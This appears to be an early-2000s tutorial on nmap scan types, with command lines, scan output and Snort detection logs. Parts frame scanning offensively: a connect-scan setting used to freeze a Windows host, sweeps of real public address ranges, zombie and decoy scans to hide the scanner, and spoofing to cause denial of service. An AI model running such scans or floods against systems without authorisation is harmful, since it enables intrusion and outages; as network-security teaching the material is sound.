The nmap options or flags are a set of inbuilt variables that help you modify how nmap probes machines.

By simply typing nmap at the command prompt you will get a breif explaination of each flag.

[root@REDHATBOX root]# nmap
Nmap 3.30 Usage: nmap [Scan Type(s)] [Options]
Some Common Scan Types ('*' options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
-sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
-sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
-sR/-I RPC/Identd scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
-p ports to scan. Example range: '1-1024,1080,6666,31337'
-F Only scans ports listed in nmap-services
-v Verbose. Its use is recommended. Use twice for greater effect.
-P0 Don't ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
-6 scans via IPv6 rather than IPv4
-T General timing policy
-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
-oN/-oX/-oG Output normal/XML/grepable scan logs to
-iL Get targets from file; Use '-' for stdin
* -S /-e Specify source address or network interface
--interactive Go into interactive mode (then press h for help)
Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'
SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES

Syn/Stealth Scanning. -sS TCP SYN stealth port scan (default if privileged (root))
The first and most widely used method is syn scanning also known as half open or stealth, unfortunately most decent ids (intrusion detection systems) can detected these packets and some firewalls and packet filterers will drop syn packets not allowing you to get a fingerprint of what the host is running. With a syn/stealth scan you do not actually make a full connection when scanning what happens is you send a syn packet and request a connection, the host being scanned then responds with a syn/ack packet telling you weather or not the port is open and responding, as soon as you receive the syn/ack packet from the remote host nmap sends a rst packet terminating the connection. So you don't actually make a full connection or 3 way handshake, that's why Syn/stealth scanning is called a half scan, due to the fact that nmap sends a rst packet before a full connection is established.

Issuing a Syn/Stealth scan.

[root@REDHATBOX root]#nmap -sS 192.168.0.1

Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-17 05:07 EST
Interesting ports on 192.168.0.4:
(The 1637 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp filtered ftp
22/tcp open ssh
23/tcp open telnet
111/tcp open sunrpc
139/tcp open netbios-ssn
1024/tcp open kdm
6000/tcp open X11

Nmap run completed -- 1 IP address (1 host up) scanned in 3.194 seconds

Notice how port 21 is filtered, a filtered port usually indicates the machine is running a firewall.

Here is a snort log of syn/stealth scanning.

[**] [111:13:1] spp_stream4: STEALTH ACTIVITY (SYN FIN scan) detection [**]
07/15-14:45:47.877211 192.168.0.3:10004 -> 202.87.19.229:1002
TCP TTL:255 TOS:0x0 ID:2304 IpLen:20 DgmLen:40
******SF Seq: 0x90AB213 Ack: 0x0 Win: 0x1000 TcpLen: 20

Jul 16 11:52:17 192.168.0.4:1460 -> 192.168.0.3:1109 SYN ******S*
Jul 16 11:52:17 192.168.0.4:1461 -> 192.168.0.3:317 SYN ******S*
Jul 16 11:52:17 192.168.0.4:1462 -> 192.168.0.3:174 SYN ******S*
Jul 16 11:52:17 192.168.0.4:1463 -> 192.168.0.3:504 SYN ******S*
Jul 16 11:52:17 192.168.0.4:1464 -> 192.168.0.3:343 SYN ******S*
Jul 16 11:52:17 192.168.0.4:1465 -> 192.168.0.3:672 SYN ******S*

As you can see snort has built a ruleset that is able to identify nmap's syn/stealth scanning sequence.

TCP()Connect Scanning. -sT TCP connect() port scan (default for unprivileged users)

Tcp connect scanning is the most basic or primitive form of scanning, almost all MS windows scanners use this method. TCP()Connect scanning is the fastest method of scanning, as it calls up system connect() and you can specify how many sockets you would like to use ,so 60 sockets means 60 connections at once. Yes that's fast. Now with the down sides of TCP() connect scanning, it's noisy every machine in the world will log a tcp connection (()connect) request so every time you send one your being logged by whatever service you make the connection too. So if you make full connections to every service listening on every port people will know exactly what you are doing.

Issuing a TCP()Connect scan

[root@REDHATBOX root]# nmap -sT 192.168.0.3

Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-17 10:02 EST
Interesting ports on 192.168.0.3:
(The 1629 ports scanned but not shown below are in state: closed)
Port State Service
9/tcp open discard
13/tcp open daytime
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
37/tcp open time
80/tcp open http
111/tcp open sunrpc
113/tcp open auth
139/tcp open netbios-ssn
443/tcp open https
515/tcp open printer
993/tcp open imaps
995/tcp open pop3s
9999/tcp open abyss

Another thing you can do with the -sT scan is DOS (Denial Of Service) a machine.

I issued nmap the following

[root@REDHATBOX root]# nmap -T 5 -M 1000 -sT 192.168.0.1
Warning: Your max_parallelism (-M) option is absurdly high! Don't complain to Fyodor if all hell breaks loose!

Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-18 06:44 EST
All 1644 scanned ports on 192.168.0.1 are: filtered

The machine i pointed this at was a windows xp professional box, the effects were obvious, the machine stooped responding and the mouse locked up. You can crash windows firewalls with these scans aswell so take care are using this method.

If you look at the command i gave nmap -T 5 -M 1000.

The -M flag sets the maximum amount of sockets nmap uses and 60 is classified as being allot, so 1000 is absurdly high according to fydor and i must agree. But it was effective.

The -T flag sets the rate or speed nmap scans hosts ranging from 0-5, 0 being the slowest and 5 being the fastest.

0 = Paranoid Tries to avoid IDS detection, no parallel scanning.
Waits 5 minutes before sending each packet, so very very slow.

1 = Sneaky also tries to avoid IDS detection, no parallel scanning.
Waits 15 seconds before sending packets.

2 = Polite Still very slow, and should be used against mission critical systems only,
will be detected by all IDS machines. Waits at least 0.4 seconds between packets,
more like about 1 sec per packet.

3 = Normal is nmaps default scanning speed and goes as fast as possible without
the risk of Denial Of Service.

4 = Aggressive is ok for fast networks, it can help against firewalls and heavily
filtered networks. Recommended for people on cable/adsl and t1 networks ect..

5 = Insane is insane times out after 0.3 seconds, so you will miss a lot of information.
Great for people on a fast connections and recommended for network sweeps.

Here is a example of the trace from snort you leave on a system if you TCP() connect scan it. Not only will all IDS machines log these scans but so will every daemon or service you connect to e.g ftp,sendmail,telnet,ssh,samba,

[**] [100:2:1] spp_portscan: portscan status from 192.168.0.4: 261 connections across 1 hosts: TCP(261), UDP(0) [**]
07/16-12:01:44.071271

[**] [1:469:1] ICMP PING NMAP [**]
[Classification: Attempted Information Leak] [Priority: 2]
07/16-12:01:46.050056 192.168.0.4 -> 192.168.0.3
ICMP TTL:45 TOS:0x0 ID:17750 IpLen:20 DgmLen:28
Type:8 Code:0 ID:31266 Seq:8282 ECHO
[Xref => http://www.whitehats.com/info/IDS162]

Jul 16 12:19:39 192.168.0.4:2418 -> 192.168.0.3:7006 SYN ******S*
Jul 16 12:19:39 192.168.0.4:2419 -> 192.168.0.3:7006 SYN ******S*
Jul 16 12:19:39 192.168.0.4:2420 -> 192.168.0.3:7006 SYN ******S*

You will notice that the main protocol is TCP (TCP(261)). And it established a lot of 3 way connections.

UDP scan -sU UDP port scan

The very simple connectionless User Data Protocol that is used for transmitting datagrams only. Basicly what the udp scans does is send datagrams and waits for a error response message from the host, it then calcualates what ports are open by not receiveing a error message suggesting it is open. Udp scanning is extemely slow, due to service response limitation of over atleast 1-4 seconds due to rfc compliance on *nix type systems, however windows has no set limitations so it will scan alot faster. I also suggest only scanning with udp as root consideing the limitations non root users face in distinguishing open and closed ports. Sure udp scanning can find all udp services but so can TCP()Connect scans and TCP()Connect. For me personaly i think udp scanning is a waste of time. But to get a true finger print of each machine it might be wise to know what you have got listening on each udp port as allot of trojans listen on udp.

Issuing a UDP scan

[root@REDHATBOX root]# nmap -sU 192.168.0.3

Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-17 11:05 EST
Interesting ports on 192.168.0.3:
(The 1467 ports scanned but not shown below are in state: closed)
Port State Service
9/udp open discard
111/udp open sunrpc
137/udp open netbios-ns
138/udp open netbios-dgm

Nmap run completed -- 1 IP address (1 host up) scanned in 1473.816 seconds

As you can see all the ports listed above are udp ports. To make things more interesting here is a scan from a windows xp machine.

Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-17 11:41 EST
Interesting ports on 192.168.0.1:
(The 1463 ports scanned but not shown below are in state: closed)
Port State Service
53/udp open domain
123/udp open ntp
135/udp open loc-srv
137/udp open netbios-ns
138/udp open netbios-dgm
445/udp open microsoft-ds
500/udp open isakmp
1900/udp open UPnP

Nmap run completed -- 1 IP address (1 host up) scanned in 7.285 seconds

If you have a look at the bottom of each scan you will notice the scan for the debian linux box took over 200 times longer than the xp pro box. Thats because as mentioned above the *nix systems complying to RFC standards.

During the scan on the debian box we set off some major bells and whistles. And on the windows xp box we fillterd the entire scan until the firewalls where turned off.

Typical firewall, blocks nmap udp scans in it's tracks.

Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-17 12:10 EST
All 1471 scanned ports on 192.168.0.1 are: filtered

Nmap run completed -- 1 IP address (1 host up) scanned in 94.786 seconds

Here is a snippet of the noise the udp scan made on the debian linux box running snort.

[**] [1:279:2] DOS Bay/Nortel Nautica Marlin [**]
[Classification: Attempted Denial of Service] [Priority: 2]
07/16-13:18:46.140390 192.168.0.4:40310 -> 192.168.0.3:161
UDP TTL:56 TOS:0x0 ID:43196 IpLen:20 DgmLen:28
Len: 8
[Xref => http://www.securityfocus.com/bid/1009]
[Xref => http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0221]

[**] [1:1042:2] WEB-IIS view source via translate header [**]
[Classification: access to a potentually vulnerable web application] [Priority: 2]
07/16-13:53:47.031804 192.168.0.1:4752 -> 192.168.0.3:80
TCP TTL:128 TOS:0x0 ID:9488 IpLen:20 DgmLen:187 DF
***AP*** Seq: 0x231C3970 Ack: 0x4242DB37 Win: 0xFAF0 TcpLen: 20
[Xref => http://www.whitehats.com/info/IDS305]

[**] [1:1042:2] WEB-IIS view source via translate header [**]
[Classification: access to a potentually vulnerable web application] [Priority: 2]
07/16-13:53:47.090385 192.168.0.1:4752 -> 192.168.0.3:80
TCP TTL:128 TOS:0x0 ID:9490 IpLen:20 DgmLen:204 DF
***AP*** Seq: 0x231C3A03 Ack: 0x4242DC29 Win: 0xF9FE TcpLen: 20
[Xref => http://www.whitehats.com/info/IDS305]

Snort did not detect the actual portscan as a portscan but it did report that the system was under attack. Not the greatest scanning technique.

Pinging -sP ping scan (Find any reachable machines)

All pinging does is distinguish if a host is up or down. It sends out ICMP echo request to hosts and if they respond there up.

Simple packet trace of a ping query. You can see the initial ICMP echo request and response by adding the following flag to a nmap scan.

[root@REDHATBOX root]# nmap --packet_trace -sP 192.168.0.*

SENT (1.1890s) ICMP 192.168.0.4 > 192.168.0.1 Echo request (type=8/code=0) ttl=54 id=32934 iplen=28
SENT (1.1890s) TCP 192.168.0.4:51585 > 192.168.0.1:80 A ttl=59 id=44623 iplen=40 seq=3782306078 win=4096 ack=3782306078
RCVD (1.1930s) ICMP 192.168.0.1 > 192.168.0.4 Echo reply (type=0/code=0) ttl=128 id=4482 iplen=28

Some sites block pings as it is quite effective in cloaking the host from some scanners.

Heres some basic tricks you can do with -sP ping.

Say if you wanted to know every machine that is up on a class C network you would issue nmap.

[root@REDHATBOX root]# nmap -sP 192.168.0.*

Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-17 13:40 EST
Host 192.168.0.0 seems to be a subnet broadcast address (returned 1 extra pings).
Host 192.168.0.1 appears to be up.
Host 192.168.0.3 appears to be up.
Host 192.168.0.4 appears to be up.
Host 192.168.0.255 seems to be a subnet broadcast address (returned 1 extra pings).
Nmap run completed -- 256 IP addresses (3 hosts up) scanned in 11.721 seconds

Nmap scanned 256 ip address and found 3 host up.

You can also scan class b networks by doing the following

[root@REDHATBOX root]# nmap -sP 202.12.*.*

Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-17 13:53 EST
Host me-202-12-3-129.btw.co.nz (202.12.3.129) appears to be up.
Host me-202-12-3-130.btw.co.nz (202.12.3.130) appears to be up.
Host me-202-12-3-135.btw.co.nz (202.12.3.135) appears to be up.
Host me-202-12-3-137.btw.co.nz (202.12.3.137) appears to be up.

If i had not of stopped nmap it would have scanned 65536 hosts. From 202.12.0.0 to 202.12.256.256. There are other ways of scanning class c networks using the slash e.g 192.168.0.0/24 and for class b use /16. Not only that but you can even add more options for example every host in class be that starts with 1. You would issue nmap the following.

[root@REDHATBOX root]# nmap -sP 202.12.*.1

Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-17 13:53 EST
Host scorpio.psu.ac.th (202.12.74.1) appears to be up.
Host 202.12.92.1 appears to be down.
Host 202.12.93.1 appears to be down.
Host 202.12.94.1 appears to be down.
Host 202.12.95.1 appears to be down.
Host 202.12.96.1 appears to be down.
Host kku1.kku.ac.th (202.12.97.1) appears to be up.

I will get more into this stuff later in the lesson.

Ftp Bounce Attack -b

This was a good fun, unfortunatly it's no longer possible. So i won't bother going into detail.

[root@REDHATBOX root]# nmap -b 192.168.0.4 192.168.0.1
Hint: if your bounce scan target hosts aren't reachable from here, remember to use -P0 so we don't try and ping them prior to the scan

Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-18 09:25 EST
Your ftp bounce server doesn't allow priviliged ports, skipping them.
Your ftp bounce server doesn't allow priviliged ports, skipping them.
Your ftp bounce server sucks, it won't let us feed bogus ports!

this is the error you will get on every ftp server that you try this on.

Idle scanning -sI

Say if you where scanning the pentagon for some unknown reason. Would you want them to know youre IP address ? no. Well you can use Idle scanning. It uses a zombie host to transmit the packets using it's IPID, ip identification number so everything that hit's the machine does not originate from you but the host you are using as the zombie. It uses the same technique as a Syn scan, the other 2 factors is the fragment identification number, nmap can source enough information from the FIN to know how many packets have been transmistted since the last packet you sent. And your zombie host must be idle.

Here is a diagram taken from the official nmap site explaining Idle scanning.

So with idle scanning we can determine a the targets status by a increment in the zombies IPID number, if our target sends a rst packet to our zombie host we know the port is closed, but if we get a syn ack sent to our zombie host we know the port is open because the zombie then has to respond to the connection. You should know by know what the zombie responds with ? remember it's just a Syn scan, so the zombie terminates the connect with a reset, rst packet. Unfortunatly not all IPID stacks are predictable, as far as i know due to microsofts ignorant defiance of RFC stands all windows machine should be suitable as zombies, older linux machines should also be fine for zombies. You just have to keep trying until you find a suitable zombie with a predictable IPID. Other factors with Idle scanning is that i recommend using nmaps default tcp port 80 to be accessable on the zombie and a windows machine.

Here is how predictable a windows machine is.

SENT (98.9480s) TCP 192.168.0.4:33609 >192.168.0.1:828 A ttl=47 id=14515 iplen=40 seq=1085816310 win=4096 ack=1085816310
RCVD (98.9640s) TCP 192.168.0.1:3344 > 192.168.0.4:22 A ttl=128 id=44516 iplen=40 seq=1375280861 win=64240 ack=1375280861
RCVD (99.1390s) TCP 192.168.0.1:3344 > 192.168.0.4:22 A ttl=128 id=44517 iplen=40 seq=1375280861 win=64100 ack=1375280861
RCVD (99.3390s) TCP 192.168.0.1:3344 > 192.168.0.4:22 A ttl=128 id=44518 iplen=40 seq=1375280861 win=63960 ack=1375280861

As you can see the id= sequence is in a increments of 1.

Here is a redhat linux 8.0 machine.

RCVD (17.2850s) TCP 127.0.0.1:44076 > 192.168.0.4:360 A ttl=51 id=40722 iplen=40 seq=3848151658 win=4096 ack=3848151658
RCVD (17.2850s) TCP 192.168.0.4:360 > 192.168.0.4:44076 R ttl=64 id=0 iplen=40 seq=3767092268 win=0
RCVD (17.2850s) TCP 127.0.0.1:44076 > 192.168.0.4:3086 A ttl=47 id=63447 iplen=40 seq=3848151658 win=4096 ack=3848151658
RCVD (17.2850s) TCP 192.168.0.4:3086 > 192.168.0.4:44076 R ttl=64 id=0 iplen=40 seq=3767092268 win=0

The redhat box is too unprediectable to use as a Idle scan zombie. You must realize that for the idle scan to work the IPID number can only increase by 1 or 2, 1 being closed 2 being open.

To issue a idle scan using nmaps default tcp() port 80 use.

[root@REDHATBOX root]# nmap -P0 -p- -sI 192.168.0.1 192.168.0.3

Starting nmap V. 3.30 ( www.insecure.org/nmap/ )
Idlescan using zombie 192.168.0.1; Class: Incremental
Interesting ports on 192.168.0.3:
(The 65522 ports scanned but not shown below are in state: closed)
Port State Service
9/tcp open discard
13/tcp open daytime
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
37/tcp open time
80/tcp open http
111/tcp open sunrpc
113/tcp open auth
139/tcp open netbios-ssn
443/tcp open https
515/tcp open printer
993/tcp open imaps
995/tcp open pop3s
9999/tcp open abyss

Nmap run completed -- 1 IP address (1 host up) scanned in 1348.167seconds

If the target checks it's logs there will be no trace of youre ip address, only the zombies. Some people do not realize the effects of Idle scanning, scans like this can crumble a entire network if the conditions are suitable. For example if the network admin has some type of packet filtering device running that co-exsist's with some form of rule set the blocks offending ip's from the network you could just spoof the dns server or mail server resulting in major denial of service.

To find Predictable IPID's you will have to start trawling the internet with nessus. Here is the information from nessus. It's plugin ID is 10201.

The remote host uses non-random IP IDs, that is, it is
possible to predict the next value of the ip_id field of
the ip packets sent by this host.

An attacker may use this feature to determine if the remote
host sent a packet in reply to another request. This may be
used for portscanning and other things.

When you do locate a machine with a predictable IPID you can then exploit certain areas of the network it is located on, considering it will be a trusted host on it's network.

-D Decoy Scanning

Decoy scanning can be used to effectively DOS or confuse the intended target. The decoy method is best described as making invalid connections on the behalf of a unaware host, basically you are sending spoofed packets with a fake source address along with your original address hoping to make it harder to find out exactly who is scanning them. If your ISP has egress filters all spoofing would be pointless but i suggest you still try it, because it is not a common implementation yet. You can also DOS a machine by sending spoofed packets on behalf of a trusted host, this only works if the machine blocks offending ip's from the network. Another thing to note is the more decoys the slower the scan for obvious reasons.

Jul 23 17:53:45 192.168.0.7:59292 -> 192.168.0.3:3455 SYN ******S*
Jul 23 17:53:45 192.168.0.7:59292 -> 192.168.0.3:173 SYN ******S*
Jul 23 17:53:44 192.168.0.4:59292 -> 192.168.0.3:32 SYN ******S*
Jul 23 17:53:44 192.168.0.4:59292 -> 192.168.0.3:759 SYN ******S*

Judging from the above log we where scanned by 2 offending ip address's one real and the other fake

the issued Decoy scan was

[root@REDHATBOX test]# nmap -p 80,22,139 -sS -D 192.168.0.7,192.168.0.1 192.168.0.3

Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-24 15:58 EST
Interesting ports on 192.168.0.3:
Port State Service
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn

Nmap run completed -- 1 IP address (1 host up) scanned in 8.879 seconds

there is a huge mistake in this scan though ? why decoy scan someone if your going to ping them ?

SENT (0.0060s) ICMP 192.168.0.4 > 192.168.0.3 Echo request (type=8/code=0) ttl=42 id=2717 iplen=28
SENT (0.0070s) ICMP 192.168.0.7 > 192.168.0.3 Echo request (type=8/code=0) ttl=58 id=27663 iplen=28
SENT (0.0070s) ICMP 192.168.0.1 > 192.168.0.3 Echo request (type=8/code=0) ttl=41 id=3618 iplen=28
RCVD (0.0070s) ICMP 192.168.0.3 > 192.168.0.4 Echo reply (type=0/code=0) ttl=64 id=37318 iplen=28

[**] [1:469:1] ICMP PING NMAP [**]
[Classification: Attempted Information Leak] [Priority: 2]
07/23-18:46:13.256183 192.168.0.4 -> 192.168.0.3
ICMP TTL:42 TOS:0x0 ID:2717 IpLen:20 DgmLen:28
Type:8 Code:0 ID:53476 Seq:52818 ECHO
[Xref => http://www.whitehats.com/info/IDS162]

[**] [1:469:1] ICMP PING NMAP [**]
[Classification: Attempted Information Leak] [Priority: 2]
07/23-18:46:13.256190 192.168.0.7 -> 192.168.0.3
ICMP TTL:58 TOS:0x0 ID:27663 IpLen:20 DgmLen:28
Type:8 Code:0 ID:53476 Seq:52818 ECHO
[Xref => http://www.whitehats.com/info/IDS162]

Ok so both ip's show up in a snort log ? who cares. I do because your ip might set of more warnings in snort than than the decoys. I have seen this happen once and I'm unable to reproduce it. And i do know that the real attackers ip in a decoy scan always shows up first in the snort alert log.

Disable pinging with the -P0 flag.

* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)

Ok, say we are scanning a very paranoid network that drops syn and tcp()connect packets from the firewall.

heres and example of a major locked down server.

root@xboxLINUX:~# nmap -sS 192.168.0.4

Starting nmap V. 2.54BETA31 ( www.insecure.org/nmap/ )
Interesting ports on (192.168.0.4):
(The 1553 ports scanned but not shown below are in state: filtered)
Port State Service
22/tcp open ssh

Nmap run completed -- 1 IP address (1 host up) scanned in 159 seconds

As you can see this machine (redhat linux 8.0) has filtered everything except ssh. Mind you this can still give us some information.

Issue the following command telnet 192.168.0.4 22

root@xboxLINUX:~# telnet 192.168.0.4 22
Trying 192.168.0.4...
Connected to 192.168.0.4.
Escape character is '^]'.
SSH-1.99-OpenSSH_3.4p1

We got what version of ssh it is running SSH-1.99-OpenSSH_3.4p1. But that still not enough for even a OS fingerprint, so we need to turn to Stealth FIN, Xmas, or Null scanning. Before i get into details lets get a decent fingerprint on our target 192.168.0.4

I issued nmap a stealth FIN scan.

root@xboxLINUX:~# nmap -sF 192.168.0.4
Starting nmap V. 2.54BETA31 ( www.insecure.org/nmap/ )
Interesting ports on (192.168.0.4):
(The 1547 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
111/tcp open sunrpc
139/tcp open netbios-ssn
1024/tcp open kdm
6000/tcp open X11

Nmap run completed -- 1 IP address (1 host up) scanned in 14 seconds

Jackpot with this result we can safely say that out target is running a firewall due to the fact that the SYN/stealth scan only gave us one open port but the FIN/stealth scan gave us all available open ports. Why does this beat firewalls ? Instead of setting the SYN flag we set a FIN flag and use the exact same method of a half scan, by using this technique and sending a FIN instead we can determine if a port is open by getting a RST packet back, and on a closed port we get no response. You see tcp is designed around rules and there are different rule sets for each communication. The tcp stack is required to responded to FIN packets in this way. Letting us exploit them.

Ok i got a windows box firewalled up, lets test it with a FIN.

root@xboxLINUX:~# nmap -sF 192.168.0.1

Starting nmap V. 2.54BETA31 ( www.insecure.org/nmap/ )
All 1554 scanned ports on (192.168.0.1) are: filtered

Nmap run completed -- 1 IP address (1 host up) scanned in 105 seconds

Ok nmap is telling us that the windows box is all filtered. The reason is that windows boxes just send a rst pack to every FIN. So even if they are open we still get a rst. So FIN scanning does not work on windows machines. So i go at the windows box with a SYN/stealth scan.

[root@REDHATBOX root]# nmap -sS 192.168.0.1

Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-20 17:06 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -P0
Nmap run completed -- 1 IP address (0 hosts up) scanned in 12.206 seconds

Now nmap is telling me that the windows box is down ? or blocking our pings. To get around firewalls like this that block incoming ICMP requests disable pinging with the -P0

[root@REDHATBOX root]# nmap -P0 -sS 192.168.0.1

Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-21 08:39 EST
Interesting ports on 192.168.0.1:
(The 1639 ports scanned but not shown below are in state: filtered)
Port State Service
135/tcp open loc-srv
1002/tcp open unknown
1025/tcp open NFS-or-IIS
1720/tcp open H.323/Q.931
5000/tcp open UPnP

Nmap run completed -- 1 IP address (1 host up) scanned in 99.125 seconds

Another thing to note with windows boxes is that usually a SYN/stealth ascanning can get around there lame firewalls. And with some windows firewalls you can actually crash them with simple TCP()connect scans. I just crashed a sygate firewall when running this scan.

[root@REDHATBOX root]# nmap -P0 -sT 192.168.0.1
Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-21 08:43 EST
Interesting ports on 192.168.0.1:
(The 1632 ports scanned but not shown below are in state: closed)
Port State Service
98/tcp filtered linuxconf
135/tcp open loc-srv
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
528/tcp filtered custix
1002/tcp open unknown
1025/tcp open NFS-or-IIS
1337/tcp open waste
1720/tcp open H.323/Q.931
1995/tcp filtered perf-port
5000/tcp open UPnP

Nmap run completed -- 1 IP address (1 host up) scanned in 293.771 seconds

Sorry got side tracked there but it is important information when pen-testing a network.

Now the other 2 scan types will give you the same results, the Xmas scan just turns on 2 extra flags and the null scan has no flags set.

Snort will log FIN scans. As you can see below.

Jul 21 13:10:21 192.168.0.4:39290 -> 192.168.0.3:571 FIN *******F
Jul 21 13:10:21 192.168.0.4:39290 -> 192.168.0.3:27007 FIN *******F
Jul 21 13:10:22 192.168.0.4:39291 -> 192.168.0.3:22 FIN *******F
Jul 21 13:10:22 192.168.0.4:39291 -> 192.168.0.3:9 FIN *******F
Jul 21 13:10:23 192.168.0.4:39291 -> 192.168.0.3:80 FIN *******F
Jul 21 13:10:22 192.168.0.4:39290 -> 192.168.0.3:139 FIN *******F
Jul 21 13:10:22 192.168.0.4:39290 -> 192.168.0.3:515 FIN *******F
Jul 21 13:10:22 192.168.0.4:39290 -> 192.168.0.3:443 FIN *******F
Jul 21 13:10:22 192.168.0.4:39290 -> 192.168.0.3:9999 FIN *******F

Snort will identify all nmap scanning techniques, another interesting thing with snort is that it will also log what flags are set in each probe.

Jul 13 12:31:46 192.168.0.4:54468 -> 192.168.0.3:9 NULL ********
Jul 13 12:31:44 192.168.0.4:54469 -> 192.168.0.3:9 NMAPID **U*P*SF
Jul 13 12:31:44 192.168.0.4:54471 -> 192.168.0.3:1 SYN ******S*
Jul 13 12:31:44 192.168.0.4:54473 -> 192.168.0.3:1 XMAS **U*P**F

Remeber Xmas scans set 3 flags URG, PUSH and FIN, and Null scans set no flags ?

* -sA Ack scanning, Firewall mapping

The Ack scan continually sends Ack Acknowledge packets, and is another useful firewall mapping scan, you can successfully scan a firewalled machine for open ports, with that information you can map the firewalls rule sets and get a understanding of what role this machine plays in the network. Acknowledge packets should get through most firewalls, because as far as non-state full firewall can tell a machine on it's network is requesting a outside connection to the internet because there are ack packets coming in acknowledging there so called syn-ack packets.

Nmap run completed -- 1 IP address (1 host up) scanned in 7.426 seconds
[root@REDHATBOX root]# nmap -sA 192.168.0.1

Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-22 10:51 EST
Interesting ports on 192.168.0.1:
(The 1641 ports scanned but not shown below are in state: filtered)
Port State Service
135/tcp UNfiltered loc-srv
1025/tcp UNfiltered NFS-or-IIS
5000/tcp UNfiltered UPnP

Nmap run completed -- 1 IP address (1 host up) scanned in 72.043 seconds

* -sO IP scanning or internet protocol scanning.

No major information can be found using IP protocol scans, it just lists what protocols the host supports. But i would avoid this method unless you really need to determine what protocols are in use, most firewalls will not send back ICMP unreachable messages and you will get a massive list of useless protocols that you will not know if they are in use or not. Nmap sends raw ip packets and waits for a ICMP response to determine what protocols are in use.

[root@REDHATBOX root]# nmap -sO 192.168.0.4

Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-21 09:26 EST
Interesting protocols on 192.168.0.4:
(The 251 protocols scanned but not shown below are in state: closed)
Protocol State Name
1 open icmp
2 open igmp
6 open tcp
17 open udp
255 open unknown

Nmap run completed -- 1 IP address (1 host up) scanned in 13.741 seconds

1 open icmp (Internet Control Message Protocol)
2 open igmp (Internet Group Management Protocol)
6 open tcp (Transmission Control Protocol)
17 open udp (User Datagram Protocol)
255 open unknown

Some machines will give false positives. AIX, HP-UX, Digital UNIX, and Windows machines. You could determine a windows machine with this scan if you had too, considering it will list every possible protocol.

-I Ident scanning

Ident scanning list the owners of each process thought a tcp connection. So it's logged and will be filterd by a decent firewall. This scan is usefull for obvious reasons. Exspecialy for hackers, they can determine what services are running as root and target them. Not every service has to be root, so why waste youre time hacking a low level user. In order to get this information we must make a full tcp connection to the machine.

[root@REDHATBOX root]# nmap -sT -I 192.168.0.3

Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-22 15:11 EST
Interesting ports on 192.168.0.3:
(The 1629 ports scanned but not shown below are in state: closed)
Port State Service Owner
9/tcp open discard root
13/tcp open daytime root
21/tcp open ftp root
22/tcp open ssh root
25/tcp open smtp root
37/tcp open time root
80/tcp open http www-data
111/tcp open sunrpc daemon
113/tcp open auth identd
139/tcp open netbios-ssn root
443/tcp open https root
515/tcp open printer root
993/tcp open imaps root
995/tcp open pop3s root
9999/tcp open abyss root

Nmap run completed -- 1 IP address (1 host up) scanned in 9.202 seconds

As you can see there are allot of root processes on this machine, and if we where to exploit anyone of them we would have full access to the entire system. This scan will not work on windows.

-f Fragmentation scanning

This method exploits a simple flaw in TCP/IP networks, a fragmented packet is required to be reassembled by the receiving host. This allows us to bypass most packet filters and firewalls unless they queue fragmented packets. Fragmentation scanning can be used with the following scan types, Xmas, Syn, Fin and null. Because this method is not widely used it can cause sniffers and even firewalls to crash or seg fault. Nmap splits the TCP header into several fragments, like dicing up a pizza, the target host then must reassemble them, by using this technique we are trying to totally bypass firewall and fool ids machines.

[root@REDHATBOX root]# nmap -f -sS 192.168.0.3

Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-07-23 11:34 EST
Interesting ports on 192.168.0.3:
(The 1628 ports scanned but not shown below are in state: closed)
Port State Service
9/tcp open discard
13/tcp open daytime
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
37/tcp open time
80/tcp open http
111/tcp open sunrpc
113/tcp open auth
139/tcp open netbios-ssn
443/tcp open https
515/tcp open printer
993/tcp open imaps
995/tcp open pop3s
1241/tcp open msg
9999/tcp open abyss

Nmap run completed -- 1 IP address (1 host up) scanned in 4.343 seconds

So just add the -f for a fragmentation scan.

The Fragmentation scan was a great success, it fooled snort into thinking it could have been bad traffic, it was not logged as a scan.

[**] [1:522:1] MISC Tiny Fragments [**]
[Classification: Potentially Bad Traffic] [Priority: 2]
07/22-13:37:26.450093 192.168.0.4 -> 192.168.0.3
TCP TTL:225 TOS:0x0 ID:59880 IpLen:20 DgmLen:36 MF
Frag Offset: 0x0 Frag Size: 0x10

[**] [1:522:1] MISC Tiny Fragments [**]
